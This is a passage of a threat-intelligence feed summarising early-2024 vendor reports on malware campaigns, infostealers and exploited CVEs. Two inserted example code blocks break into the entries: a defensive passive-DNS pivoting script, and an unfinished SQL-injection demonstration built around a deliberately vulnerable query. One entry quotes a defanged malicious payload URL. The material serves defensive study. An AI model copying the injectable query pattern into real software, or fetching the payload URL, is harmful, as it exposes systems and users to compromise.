Malwarebytes Labs researchers have discovered a malvertising campaign posing as the widely-used VPN service NordVPN. A malicious advertiser hijacks traffic from Bing searches, redirecting users to a fake site closely resembling the authentic NordVPN platform.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/04/bing-ad-for-nordvpn-leads-to-sectoprat
2024-04-05
A_New_Threat_Group_Named_CoralRaider
LOW
+
Intel Source:
Cisco Talos
Intel Name:
A_New_Threat_Group_Named_CoralRaider
Date of Scan:
2024-04-05
Impact:
LOW
Summary:
Researchers from Cisco Talos have identified a new threat actor known as "CoralRaider," which they assess to be financially motivated and of Vietnamese origin. CoralRaider has been targeting victims in several Asian and Southeast Asian nations since at least 2023. Credentials, bank information, and social media accounts, including business and advertising accounts, are the main targets of this group.
Source: https://blog.talosintelligence.com/coralraider-targets-socialmedia-accounts/
2024-04-05
Updated_StrelaStealer_infostealer_targets_Europe
LOW
+
Intel Source:
Sonicwall
Intel Name:
Updated_StrelaStealer_infostealer_targets_Europe
Date of Scan:
2024-04-05
Impact:
LOW
Summary:
Sonicwall researchers shared the analysis of the updated version of a malware called StrelaStealer, which is targeting European countries. The malware is delivered via JavaScript in email attachments and is designed to steal email account credentials from Outlook and Thunderbird.
Source: https://blog.sonicwall.com/en-us/2024/04/updated-strelastealer-targeting-european-countries/
2024-04-05
Chinese_Hacker_Groups_Exploit_Ivanti_Security_Flaws
LOW
+
Intel Source:
Mandiant
Intel Name:
Chinese_Hacker_Groups_Exploit_Ivanti_Security_Flaws
Date of Scan:
2024-04-05
Impact:
LOW
Summary:
Mandiant researchers have identified several Chinese hacker groups exploiting vulnerabilities in Ivanti systems, particularly CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893. In addition, they have observed financially motivated actors exploiting CVE-2023-46805 and CVE-2024-21887, potentially to engage in cryptocurrency mining.
Source: https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement
2024-04-04
JsOutProx_Malware_Targets_Financial_Institutions
LOW
+
Intel Source:
Resecurity
Intel Name:
JsOutProx_Malware_Targets_Financial_Institutions
Date of Scan:
2024-04-04
Impact:
LOW
Summary:
Resecurity researchers discovered an updated iteration of JSOutProx, showcasing the malicious actors' persistent and sophisticated tactics through the exploitation of platforms such as GitHub and GitLab. Initially identified in 2019, JSOutProx continues to pose a substantial and evolving threat, especially targeting customers of financial institutions.
Source: https://www.resecurity.com/blog/article/the-new-version-of-jsoutprox-is-attacking-financial-institutions-in-apac-and-mena-via-gitlab-abuse
2024-04-04
VS_Code_Extensions_Caught_Harvesting_Sensitive_Data
LOW
+
Intel Source:
ReversingLabs
Intel Name:
VS_Code_Extensions_Caught_Harvesting_Sensitive_Data
Date of Scan:
2024-04-04
Impact:
LOW
Summary:
Researchers at ReversingLabs uncovered a recent malicious campaign featuring a range of malicious packages, from basic infostealers and downloaders to more sophisticated reverse shells and complex payloads. Among these, two Visual Studio Code extensions were discovered, characterized by their simple design and heavy reliance on sample code provided by Microsoft for VS Code beginners.
Source: https://www.reversinglabs.com/blog/malicious-helpers-vs-code-extensions-observed-stealing-sensitive-information
2024-04-04
Effect_on_LockBit_Post_Significant_Disruption
LOW
+
Intel Source:
Trend Micro
Intel Name:
Effect_on_LockBit_Post_Significant_Disruption
Date of Scan:
2024-04-04
Impact:
LOW
Summary:
Trend Micro's latest publication offers significant insights into the aftermath of Operation Cronos, shedding light on LockBit's post-disruption strategies. Their research delves into telemetry data showcasing LockBit's transition to a .NET core, highlighting the necessity for innovative security detection methods. Furthermore, the exposure of LockBit's backend details has not only unveiled affiliate identities and victim information but also potentially disrupted trust and collaboration within the cybercriminal ecosystem.
Source: https://www.trendmicro.com/en_us/research/24/d/operation-cronos-aftermath.html
2024-04-04
Unveiling_the_Advanced_Tactics_of_the_Counterfeit_E_Commerce_Scheme
LOW
+
Intel Source:
Cyble
Intel Name:
Unveiling_the_Advanced_Tactics_of_the_Counterfeit_E_Commerce_Scheme
Date of Scan:
2024-04-04
Impact:
LOW
Summary:
Cyble researchers have identified an escalating fake e-shop campaign targeting 18 Malaysian banks with upgraded malicious applications. This campaign, which initially targeted Malaysian banks, has expanded its scope to include banks in Vietnam and Myanmar. The latest iteration of the malware introduces advanced functionalities, including screen-sharing capabilities, the use of accessibility services, and complex communication with command and control servers.
Source: https://cyble.com/blog/elevating-the-stakes-the-enhanced-arsenal-of-the-fake-e-shop-campaign/
2024-04-04
Emergence_of_Latrodectus_Malware_in_Email_Threat_Campaigns
MEDIUM
+
Intel Source:
Proofpoint
Intel Name:
Emergence_of_Latrodectus_Malware_in_Email_Threat_Campaigns
Date of Scan:
2024-04-04
Impact:
MEDIUM
Summary:
Proofpoint researchers have noticed a recent addition to email threat campaigns called Latrodectus. It first surfaced in late November 2023. Although its presence declined in December 2023 and January 2024, it made a resurgence in February and March 2024. Latrodectus functions as a downloader and comes equipped with several features to evade sandbox detection. While it shares similarities with IcedID, it's a distinct malware believed to originate from the developers of IcedID.
Source: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
2024-04-04
North_Korea_threat_group_Python_Payloads
LOW
+
Intel Source:
Norfolkinfosec
Intel Name:
North_Korea_threat_group_Python_Payloads
Date of Scan:
2024-04-04
Impact:
LOW
Summary:
Norfolkinfosec researchers provided technical details of the second- and third-stage malware used by a North Korean threat actor group. Their write-up includes code analysis and the names and hashes of the files involved: for example, main.py is an obfuscated Python script that downloads and executes the next two stages, while brow.py steals browser data and pay.py acts as a backdoor with keylogging capabilities.
Source: https://norfolkinfosec.com/north-koreas-post-infection-python-payloads/
2024-04-04
Rhadamanthys_Malware_Concealed_within_Groupware_Installer
LOW
+
Intel Source:
ASEC
Intel Name:
Rhadamanthys_Malware_Concealed_within_Groupware_Installer
Date of Scan:
2024-04-04
Impact:
LOW
Summary:
ASEC researchers uncovered that Rhadamanthys malware was being distributed disguised as a groupware installer. The attackers created a fake website resembling the original and promoted it through online ads. The malware employs a stealthy technique called "indirect syscall" to evade detection by security tools, making it challenging to spot.
Source: https://asec.ahnlab.com/en/63864/
2024-04-03
A_significant_change_in_the_campaigns_that_distribute_Pikabot
LOW
+
Intel Source:
McAfee
Intel Name:
A_significant_change_in_the_campaigns_that_distribute_Pikabot
Date of Scan:
2024-04-03
Impact:
LOW
Summary:
Recently, McAfee Labs observed a significant change in the campaigns that distribute Pikabot. Pikabot is distributed through multiple file types for various reasons, depending on the objectives and nature of the attack. In this campaign, Pikabot is distributed through a zip file that includes an HTML file. This HTML file then proceeds to download a text file, ultimately resulting in the deployment of the payload.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/distinctive-campaign-evolution-of-pikabot-malware/
2024-04-03
Diverse_Campaign_Tactics_and_Payload_Analysis
LOW
+
Intel Source:
Mcafee
Intel Name:
Diverse_Campaign_Tactics_and_Payload_Analysis
Date of Scan:
2024-04-03
Impact:
LOW
Summary:
Pikabot, a malicious backdoor, has exhibited a significant evolution in its campaign tactics, distribution methods, and infection vectors since early 2023. McAfee Labs' recent analysis reveals distinctive campaign variations employed by Pikabot, including HTML, JavaScript, SMB share, Excel, and JAR campaigns. Each campaign utilizes unique infection chains, such as utilizing meta tag refreshes in HTML, leveraging JavaScript to execute curl.exe, exploiting the MonikerLink bug via SMB shares, embedding SMB share links in Excel files, and dropping payloads through JAR files.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/distinctive-campaign-evolution-of-pikabot-malware/
2024-04-03
The_Anatomy_of_Stealers
LOW
+
Intel Source:
SOC Radar
Intel Name:
The_Anatomy_of_Stealers
Date of Scan:
2024-04-03
Impact:
LOW
Summary:
This article provides a comprehensive overview of stealer malware and its impact on cybersecurity. It emphasizes the need for continuous research into the operational mechanisms and tactics used by cybercriminals, the importance of threat intelligence, and the use of the MITRE ATT&CK framework in understanding and defending against stealer malware. It discusses the characteristics and common techniques of these malicious programs, as well as the need for continuous education and awareness and the use of effective security tools and practices. The article introduces the top five most common stealers and their distinguishing features, and provides a detailed analysis of the Amadey Stealer and its techniques, along with the top 15 most common ASN operators seen in stealer malware's IP connections. It also discusses the prevalence of HTTP connections in stealer malware and the need for caution when considering blocking this protocol. It concludes by emphasizing the importance of integrating threat intelligence and using advanced cybersecurity solutions to detect and prevent these evolving threats.
Source: https://socradar.io/the-anatomy-of-stealers-how-are-they-stealing-our-information-where-are-they-taking-it/
2024-04-03
The_resurgence_of_the_Manipulaters_cybercrime_group
LOW
+
Intel Source:
Domain tools
Intel Name:
The_resurgence_of_the_Manipulaters_cybercrime_group
Date of Scan:
2024-04-03
Impact:
LOW
Summary:
The article discusses the resurgence of the "Manipulaters" team, a cybercrime group known for spamming and phishing. The team relies on DP access, "bulletproof" hosting, and forged identity documents, and rebrands and combines existing tools into software products, chiefly spam services built around the HeartSender spamming tool. The article lists domains, IP addresses, email addresses, and usernames associated with the group, including nearly 500 domains registered to the email address "fudtoolshop@gmail.com" and the various aliases the group uses, and discusses HeartSender's use of JavaScript and XML. It traces the group's history and current activities, its limited technical sophistication, its expansion into selling web domains, its likely involvement in impersonating the USPS, and its use of session cookie grabbers. It also documents the group's operational security failures, including the compromise of several PCs associated with the Manipulaters and the resulting exposure of customer data and operational details, which put the group's own customers at risk. The article closes with two clusters of activity, each with usernames, email addresses, and associated domains, plus a list of active shops, and urges businesses and consumers to remain vigilant against groups like the Manipulaters.
Source: https://www.domaintools.com/resources/blog/the-resurgence-of-the-manipulaters-team-breaking-heartsenders/
2024-04-03
Magento_Ecommerce_Malware
LOW
+
Intel Source:
Sucuri
Intel Name:
Magento_Ecommerce_Malware
Date of Scan:
2024-04-03
Impact:
LOW
Summary:
The article discusses the threat of "Magento Shoplift" malware, which targets ecommerce websites using WordPress and Magento CMS platforms. The malware is designed to steal payment information and has been found in different forms, including one that disguises as a Google Analytics script. The author, a security analyst, provides steps for mitigating the risk of this malware, such as keeping CMS software and plugins updated and using strong passwords.
Source: https://blog.sucuri.net/2024/04/magento-shoplift-ecommerce-malware-targets-both-wordpress-magento-cms.html
2024-04-03
XZ_Upstream_Supply_Chain_Attack
HIGH
+
Intel Source:
Crowdstrike
Intel Name:
XZ_Upstream_Supply_Chain_Attack
Date of Scan:
2024-04-03
Impact:
HIGH
Summary:
The article discusses the CVE-2024-3094 vulnerability found in the XZ Utils library and how CrowdStrike is actively protecting its customers from potential exploitation. It provides an overview of the vulnerability, its impact, and how it can be detected and prevented using CrowdStrike's Falcon platform. The article also offers guidance for organizations to defend against the exploitation of this vulnerability, along with relevant hashes and additional resources for further information.
Source: https://www.crowdstrike.com/blog/cve-2024-3094-xz-upstream-supply-chain-attack/
2024-04-02
Bellingcat_Malware_analysis
LOW
+
Intel Source:
Intelcorgi
Intel Name:
Bellingcat_Malware_analysis
Date of Scan:
2024-04-02
Impact:
LOW
Summary:
The analysis involves an email campaign targeting the journalist group Bellingcat, delivering a malicious zip file that ultimately deploys an HTTP reverse shell. The infection chain involves a malicious zip archive, a .lnk file masquerading as a PDF, and a PowerShell script executing a reverse shell that enables data exfiltration. The campaign is attributed to a Russia-nexus threat actor based on consistently targeting organizations critical of Russia.
Source: https://intelcorgi.com/2024/03/24/bellingcat-malware-investigation/
2024-04-02
Additional_malicious_infrastructure_of_the_ACTINIUM_threat_group
MEDIUM
+
Intel Source:
Embeeresearch
Intel Name:
Additional_malicious_infrastructure_of_the_ACTINIUM_threat_group
Date of Scan:
2024-04-02
Impact:
MEDIUM
Summary:
This report demonstrates the process of leveraging publicly available intelligence reports and passive DNS analysis tools to uncover additional malicious infrastructure associated with a specific threat actor, referred to as ACTINIUM. By analyzing patterns in domains, IP addresses, registration dates, and subdomain structures provided in an initial report by Microsoft, the analysis identifies 122 new domains exhibiting similar characteristics. The report serves as an educational guide on how analysts can expand on existing intelligence using accessible tooling and open-source data.
Source: https://www.embeeresearch.io/uncovering-apt-infrastructure-with-passive-dns-pivoting/
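The pivoting workflow described above (start from the indicators in a published report, then score other passive-DNS records by shared IP, registration date, registrar, and subdomain structure) is easy to automate. The following is an added example, not code from Embee Research or the Microsoft report; every domain, IP, date and registrar in it is constructed (reserved .invalid names and documentation IP ranges), and the scoring thresholds are assumptions.

```python
"""
Passive-DNS pivoting on constructed data: score candidate domains by how many
attributes they share with known-bad seed records. All indicators below are
constructed for illustration (reserved .invalid TLD and documentation IP
ranges); none come from the Microsoft or Embee Research reports.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import date, timedelta


@dataclass(frozen=True)
class DnsRecord:
    fqdn: str       # name observed in passive DNS
    ip: str         # A record it resolved to
    created: date   # registration date of the registrable domain
    registrar: str  # registrar of record


def subdomain_shape(fqdn: str) -> str:
    """Reduce a name to its structural shape so names generated by the same
    tooling match even when the labels differ, e.g.
    'update.a1b2c3.seed-one.invalid' -> 'alpha.alnum.alnum.alpha'."""
    shape = []
    for label in fqdn.lower().rstrip(".").split("."):
        if re.fullmatch(r"[a-z]+", label):
            shape.append("alpha")
        elif re.fullmatch(r"[0-9]+", label):
            shape.append("digit")
        elif re.fullmatch(r"[a-z0-9-]+", label):
            shape.append("alnum")
        else:
            shape.append("other")
    return ".".join(shape)


def pivot(seeds, candidates, date_window_days=7, min_score=2):
    """Return {fqdn: [matching attributes]} for candidates sharing at least
    `min_score` attributes with the seed set. One shared attribute alone (for
    example an IP on shared hosting) is deliberately not enough."""
    seed_ips = {s.ip for s in seeds}
    seed_shapes = {subdomain_shape(s.fqdn) for s in seeds}
    seed_registrars = {s.registrar for s in seeds}
    seed_dates = [s.created for s in seeds]
    window = timedelta(days=date_window_days)
    hits = {}
    for c in candidates:
        if c in seeds:
            continue
        reasons = []
        if c.ip in seed_ips:
            reasons.append("shared_ip")
        if any(abs(c.created - d) <= window for d in seed_dates):
            reasons.append("creation_date")
        if subdomain_shape(c.fqdn) in seed_shapes:
            reasons.append("subdomain_shape")
        if c.registrar in seed_registrars:
            reasons.append("registrar")
        if len(reasons) >= min_score:
            hits[c.fqdn] = reasons
    return hits


# Constructed seed indicators, standing in for the domains an initial report lists.
SEEDS = [
    DnsRecord("update.a1b2c3.seed-one.invalid", "203.0.113.10", date(2022, 1, 5), "registrar-a"),
    DnsRecord("sync.z9y8x7.seed-two.invalid", "203.0.113.11", date(2022, 1, 6), "registrar-a"),
]

# Constructed passive-DNS pool: two look-alikes, one benign site, and one
# unrelated site that merely shares an IP with a seed.
CANDIDATES = SEEDS + [
    DnsRecord("login.q4w5e6.cand-one.invalid", "203.0.113.10", date(2022, 1, 7), "registrar-a"),
    DnsRecord("portal.m7n8o9.cand-two.invalid", "198.51.100.9", date(2022, 1, 4), "registrar-a"),
    DnsRecord("www.benign.invalid", "198.51.100.5", date(2019, 6, 1), "registrar-b"),
    DnsRecord("cdn.static.legit-site.invalid", "203.0.113.10", date(2018, 3, 3), "registrar-c"),
]


def run_example():
    return pivot(SEEDS, CANDIDATES)


if __name__ == "__main__":
    for fqdn, reasons in run_example().items():
        print(f"{fqdn}: {', '.join(reasons)}")
```

The point of the minimum score is the caveat any pivot needs: a shared IP on its own is weak evidence when the address belongs to a CDN or shared hosting, so the constructed `cdn.static.legit-site.invalid` record is not flagged even though it resolves to a seed IP.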
2024-04-02
DLL_Hijacking_and_API_Unhooking_in_the_Face_of_UNAPIMON_Malware
LOW
+
Intel Source:
Trend Micro
Intel Name:
DLL_Hijacking_and_API_Unhooking_in_the_Face_of_UNAPIMON_Malware
Date of Scan:
2024-04-02
Impact:
LOW
Summary:
Trend Micro researchers analyzed a recent cyberespionage attack attributed to Earth Freybug, a sophisticated threat group engaged in both espionage and financially motivated activity. The attack used dynamic-link library (DLL) hijacking and application programming interface (API) unhooking to evade detection; the unhooking was performed by a newly discovered malware named UNAPIMON.
Source: https://www.trendmicro.com/en_us/research/24/d/earth-freybug.html
2024-04-02
Venom_RAT_poses_a_threat_across_various_sectors
LOW
+
Intel Source:
linkedin(Perception Point)
Intel Name:
Venom_RAT_poses_a_threat_across_various_sectors
Date of Scan:
2024-04-02
Impact:
LOW
Summary:
This article highlights how attackers are employing phishing emails to distribute Venom RAT, a variant of Quasar RAT, across a wide array of sectors including hotels, travel, trading, finance, manufacturing, industry, and government in countries like Spain, Mexico, the United States, Colombia, Portugal, Brazil, the Dominican Republic, and Argentina. The threat actor TA558 is identified as the mastermind behind this extensive phishing campaign targeting Latin America.
Source: https://www.linkedin.com/feed/update/urn:li:activity:7180255262807572480/
2024-04-02
Cloud_Werewolf_attacks_government_officials_in_Russia_and_Belarus
LOW
+
Intel Source:
Bi.Zone
Intel Name:
Cloud_Werewolf_attacks_government_officials_in_Russia_and_Belarus
Date of Scan:
2024-04-02
Impact:
LOW
Summary:
A cyberthreat group, identified as Cloud Werewolf, is conducting phishing campaigns targeting government employees in Russia and Belarus. The adversaries employ crafted emails mimicking legitimate documents, such as medical vouchers and federal orders, to lure victims into downloading malicious payloads. These payloads are hosted on remote servers, and their distribution is limited, allowing the threat actors to evade cybersecurity defenses within the targeted organizations.
Source: https://bi.zone/expertise/blog/cloud-werewolf-atakuet-gossluzhashchikh-rossii-i-belarusi-putevkami-na-lechenie-i-prikazami-sluzhb
2024-04-02
Agent_Tesla_targeting_US_and_Australia
MEDIUM
+
Intel Source:
Checkpoint
Intel Name:
Agent_Tesla_targeting_US_and_Australia
Date of Scan:
2024-04-02
Impact:
MEDIUM
Summary:
Check Point Research discovered a recent Agent Tesla campaign targeting American and Australian organizations. The phishing emails first harvest organizational email credentials, which are then used to reach further targets, with the end goal of executing Agent Tesla samples. CPR tracked the activity to two cybercrime actors behind the operation, Bignosa and Gods, and found evidence that the two are connected.
Source: https://research.checkpoint.com/2024/agent-tesla-targeting-united-states-and-australia/
2024-04-01
IcedID_Malware_Leveraged_in_Multi_Stage_Attack
LOW
+
Intel Source:
TheDFIRreport
Intel Name:
IcedID_Malware_Leveraged_in_Multi_Stage_Attack
Date of Scan:
2024-04-01
Impact:
LOW
Summary:
In a cyber intrusion that occurred between late February and late March 2023, threat actors exploited a phishing campaign using Microsoft OneNote files to deliver the IcedID malware. The attack evolved through multiple stages, starting with IcedID deployment and persistence establishment. Subsequently, the attackers leveraged Cobalt Strike and AnyDesk to target file and backup servers, followed by data exfiltration using FileZilla and deployment of Nokoyawa ransomware.
Source: https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/
2024-04-01
Cyberattacks_in_Multiple_Countries_Using_the_Linux_Version_of_DinodasRAT
MEDIUM
+
Intel Source:
Checkpoint
Intel Name:
Cyberattacks_in_Multiple_Countries_Using_the_Linux_Version_of_DinodasRAT
Date of Scan:
2024-04-01
Impact:
MEDIUM
Summary:
Check Point researchers have been tracking a China-nexus threat actor conducting cyber espionage against Southeast Asia, Africa, and South America. This activity closely corresponds with Trend Micro's published analysis of the threat actor Earth Krahang. One noteworthy tool in the actor's arsenal is DinodasRAT, alias XDealer, a cross-platform backdoor previously seen in attacks by the Chinese threat actor LuoYu.
Source: https://research.checkpoint.com/2024/29676/
2024-04-01
Deceptive_Malware_Distribution_via_Google_Ads_Tracking
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Deceptive_Malware_Distribution_via_Google_Ads_Tracking
Date of Scan:
2024-04-01
Impact:
MEDIUM
Summary:
AhnLab Security Intelligence Center (ASEC) has uncovered a sophisticated malware distribution campaign exploiting Google Ads tracking. The attackers disguise malicious software as installers for popular groupware like Notion and Slack, tricking users into downloading and executing malware. Through a complex redirection sequence, users are led to a seemingly legitimate landing page, and the malware payload is then injected into legitimate Windows system processes. The resulting Rhadamanthys infection poses a significant threat because it operates stealthily inside legitimate processes, enabling data theft without the user noticing.
Source: https://asec.ahnlab.com/en/63477/
2024-04-01
New_MuddyWater_Campaigns
MEDIUM
+
Intel Source:
Malwation
Intel Name:
New_MuddyWater_Campaigns
Date of Scan:
2024-04-01
Impact:
MEDIUM
Summary:
The MuddyWater APT group has launched new attacks in Israel, Africa, and Turkiye, combining in-house products with repurposed third-party tools. The phishing emails carry PDF attachments that lead to remote management agents from services such as Atera and ConnectWise; once installed, the actors gain the privileges needed to monitor the host and execute files. MuddyWater is adjusting its tactics to shrink its digital footprint and is likely to increase spear-phishing from compromised accounts: technical analysis shows attack files named for their targets, and the agents are built under compromised business accounts to make the lure more convincing. The remote access tools provide persistence and capabilities such as command execution and file operations. MuddyWater aligns its attacks with Iran's interests while adding techniques and using legitimate tools to preserve anonymity.
Source: https://www.malwation.com/blog/new-muddywater-campaigns-after-operation-swords-of-iron
2024-04-01
Hackers_target_macOS_users_with_malicious_ads_spreading_Stealer_Malware
LOW
+
Intel Source:
Jamf Threat Labs
Intel Name:
Hackers_target_macOS_users_with_malicious_ads_spreading_Stealer_Malware
Date of Scan:
2024-04-01
Impact:
LOW
Summary:
Researchers from Jamf Threat Labs discovered that attackers are targeting individuals in the crypto industry, recognizing the potential for substantial profits. Those involved in this sector must remain highly vigilant, as public information often reveals their status as asset holders or their association with crypto-related companies, making them prime targets.
Source: https://www.jamf.com/blog/infostealers-pose-threat-to-macos/
2024-04-01
ACR_Stealer_Promotion_on_a_Well_Known_Russian_Forum
LOW
+
Intel Source:
CYFIRMA Research
Intel Name:
ACR_Stealer_Promotion_on_a_Well_Known_Russian_Forum
Date of Scan:
2024-04-01
Impact:
LOW
Summary:
Cyfirma researchers found ACR Stealer being promoted on a well-known Russian forum. The threat actors' OPSEC errors allowed the researchers to track compromised bots, which led them to the samples. These were all collected at roughly the same time in late December 2023 and have fewer than ten VT detections between them. The timeframe aligns with the threat actor's own account of operating privately before going public.
Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_acr-stealer-is-being-advertised-on-a-prominent-activity-7179498200632872960-S6Jb?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy
2024-04-01
Masked_macOS_stealer_found
LOW
+
Intel Source:
Moonlock
Intel Name:
Masked_macOS_stealer_found
Date of Scan:
2024-04-01
Impact:
LOW
Summary:
Researchers at Moonlock Lab examined an AppleScript/Bash payload hosted on a remote server and concluded that the software poses a serious risk to the security and privacy of unsuspecting users. The Moonlock blog details the threats posed by the payload, the trojan's modus operandi, and the potential consequences for macOS users.
Source: https://moonlock.com/macos-stealer-apple-bash-payload
2024-03-29
Malicious_activity_on_endpoints_running_MSSQL_Server_or_MSSQL_Express
MEDIUM
+
Intel Source:
Huntress
Intel Name:
Malicious_activity_on_endpoints_running_MSSQL_Server_or_MSSQL_Express
Date of Scan:
2024-03-29
Impact:
MEDIUM
Summary:
Huntress SOC analysts tracked new alerts showing malicious activity on endpoints running MSSQL Server or MSSQL Express, either as stand-alone installations or as part of a larger application package. A recent series of incidents across three endpoints running the Fortinet Enterprise Management Server (EMS) system began with such alerts.
Source: https://www.huntress.com/blog/mssql-to-screenconnect
2024-03-29
Exploiting_FortiClient_EMS_Vulnerability_Actively
MEDIUM
+
Intel Source:
PaloAlto
Intel Name:
Exploiting_FortiClient_EMS_Vulnerability_Actively
Date of Scan:
2024-03-29
Impact:
MEDIUM
Summary:
Unit 42 researchers observed ongoing exploitation of the recently disclosed FortiClient EMS vulnerability, CVE-2023-48788. The activity resulted in unauthorized installations of Meterpreter, the ScreenConnect client, and the Atera agent.
Source: https://www.linkedin.com/posts/unit42_atera-screenconnect-meterpreter-activity-7179196571689922560-tgvm?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy
2024-03-29
Attacks_on_USPS_and_global_postal_services
LOW
+
Intel Source:
Netcraft
Intel Name:
Attacks_on_USPS_and_global_postal_services
Date of Scan:
2024-03-29
Impact:
LOW
Summary:
'darcula' [sic] is a new, sophisticated Chinese Phishing-as-a-Service (PhaaS) platform used across more than 20,000 phishing domains. It gives cybercriminals easy access to branded phishing campaigns and targets organizations in multiple countries with sophisticated techniques.
Source: https://www.netcraft.com/blog/darcula-smishing-attacks-target-usps-and-global-postal-services/
2024-03-29
Zero_Trust_Solution_Misconfiguration_Enables_Threat_Actors_to_Bypass_2FA
LOW
+
Intel Source:
Adlumin
Intel Name:
Zero_Trust_Solution_Misconfiguration_Enables_Threat_Actors_to_Bypass_2FA
Date of Scan:
2024-03-29
Impact:
LOW
Summary:
Adlumin researchers detected a breach where attackers evaded Duo, a widely-used zero-trust security tool, to illicitly access a company's networks. Adlumin urges organizations to review user access policies for accuracy and evaluate the security implications of allowing select users to bypass 2FA.
Source: https://adlumin.com/post/misconfiguration-in-zero-trust-solution-could-allow-threat-actors-to-bypass-2fa/
2024-03-29
Technical_analysis_of_IDAT_Loader_to_download_BruteRatel
MEDIUM
+
Intel Source:
Rapid7
Intel Name:
Technical_analysis_of_IDAT_Loader_to_download_BruteRatel
Date of Scan:
2024-03-29
Impact:
MEDIUM
Summary:
This month, in two recent investigations, Rapid7’s Managed Detection & Response team observed the IDAT loader being used again. Based on the recent tactics, techniques, and procedures tracked, Rapid7's team confirmed the activity is associated with financially motivated threat groups.
Source: https://www.rapid7.com/blog/post/2024/03/28/stories-from-the-soc-part-1-idat-loader-to-bruteratel/
2024-03-28
Malicious_Google_Ad_Leads_To_Matanbuchus_Infection_With_DanaBot
LOW
+
Intel Source:
PaloAlto
Intel Name:
Malicious_Google_Ad_Leads_To_Matanbuchus_Infection_With_DanaBot
Date of Scan:
2024-03-28
Impact:
LOW
Summary:
Unit 42 researchers at Palo Alto Networks found a Google advertisement that leads users to a fake funds-claim website, which delivers Matanbuchus; the Matanbuchus infection in turn installs DanaBot.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-03-26-IOCs-for-Matanbuchus-infection-with-Danabot.txt
2024-03-28
PyPi_Suspends_Project_Creation_and_User_Registration_Amid_Security_Threat
LOW
+
Intel Source:
Checkmarx
Intel Name:
PyPi_Suspends_Project_Creation_and_User_Registration_Amid_Security_Threat
Date of Scan:
2024-03-28
Impact:
LOW
Summary:
Checkmarx researchers uncovered a campaign of numerous malicious packages that typosquat popular package names, so that a mistyped name in a command-line Python package install fetches the malicious package instead. The attackers aim to steal crypto wallets, browser data, and credentials, and use persistence mechanisms to survive reboots.
Source: https://checkmarx.com/blog/pypi-is-under-attack-project-creation-and-user-registration-suspended/
2024-03-28
AgentTesla_Expands_Its_Footprint_in_Italy
MEDIUM
+
Intel Source:
CERT-AGID
Intel Name:
AgentTesla_Expands_Its_Footprint_in_Italy
Date of Scan:
2024-03-28
Impact:
MEDIUM
Summary:
Operators of AgentTesla have recently stepped up their malspam efforts in Italy, continuing the upward trend in PDF attachment usage noted in recent months. The PDFs contain links that, when clicked, download files containing malicious JavaScript code.
Source: https://cert-agid.gov.it/news/agenttesla-intensifica-la-sua-presenza-in-italia-il-ruolo-cruciale-degli-allegati-pdf/
2024-03-28
A_recent_leak_of_a_Solana_drainer_source_code
LOW
+
Intel Source:
Cyble
Intel Name:
A_recent_leak_of_a_Solana_drainer_source_code
Date of Scan:
2024-03-28
Impact:
LOW
Summary:
Cyble Research and Intelligence Labs (CRIL) found multiple drainer source codes leaked on cybercrime forums, including a recent leak of a Solana drainer’s source code.
Source: https://cyble.com/blog/solana-drainers-source-code-saga-tracing-its-lineage-to-the-developers-of-ms-drainer/
2024-03-28
After_FBI_Seizure_WarzoneRAT_Returns_With_Multi_Stage_Attack
MEDIUM
+
Intel Source:
Cyble
Intel Name:
After_FBI_Seizure_WarzoneRAT_Returns_With_Multi_Stage_Attack
Date of Scan:
2024-03-28
Impact:
MEDIUM
Summary:
Researchers at Cyble noticed a tax-themed campaign that likely spread via spam emails and delivered WarzoneRAT (AveMaria). AveMaria is a Remote Administration Tool (RAT) that takes commands from a Command and Control (C&C) server and carries out a range of malicious activities.
Source: https://cyble.com/blog/warzonerat-returns-with-multi-stage-attack-post-fbi-seizure/
2024-03-28
An_interesting_piece_of_JavaScript
LOW
+
Intel Source:
ISC.SANS
Intel Name:
An_interesting_piece_of_JavaScript
Date of Scan:
2024-03-28
Impact:
LOW
Summary:
Senior ISC Handler Xavier Mertens recently analyzed an interesting JavaScript payload downloaded from hxxp://gklmeliificagac[.]top/vc7etyp5lhhtr.php?id=win10vm&key=127807548032&s=mints1. Fetched directly, the page does not work and redirects to another site, after which a further payload is delivered.
Source: https://isc.sans.edu/diary/rss/30788
2024-03-28
Exploitation_of_Fortinet_Vulnerability_CVE_2023_48788
MEDIUM
+
Intel Source:
Esentire
Intel Name:
Exploitation_of_Fortinet_Vulnerability_CVE_2023_48788
Date of Scan:
2024-03-28
Impact:
MEDIUM
Summary:
This month, eSentire has tracked a spike in the exploitation of CVE-2023-48788 (CVSS: 9.8). CVE-2023-48788 is a SQL injection flaw in FortiClientEMS software. Exploitation would allow an unauthenticated remote threat actor to execute code or commands through specially crafted requests, enabling initial organizational access.
Source: https://www.esentire.com/security-advisories/widespread-exploitation-of-fortinet-vulnerability-cve-2023-48788
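CVE-2023-48788 is described above as a SQL injection that lets an unauthenticated request change what the server executes. The primitive behind that class of bug, and the fix, are shown in the following added example; it is a generic demonstration on an in-memory SQLite table, not FortiClient EMS code and not the exploit, and the table, rows and payload are constructed. How an injection is escalated to command execution depends on the database engine and is not shown here.

```python
"""
Illustrative SQL injection: a request parameter concatenated into SQL text
versus the same lookup with a bound parameter. Generic demonstration on an
in-memory SQLite table; not the FortiClient EMS code or the CVE-2023-48788
exploit. The table, rows and payload are constructed.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed inventory table standing in for whatever a management server stores."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE endpoints (hostname TEXT NOT NULL, owner TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO endpoints VALUES (?, ?)",
        [("ws-01", "alice"), ("ws-02", "bob"), ("srv-01", "carol")],
    )
    conn.commit()
    return conn


def vulnerable_lookup(conn, hostname: str):
    """Request-controlled value spliced into the statement text: a single quote
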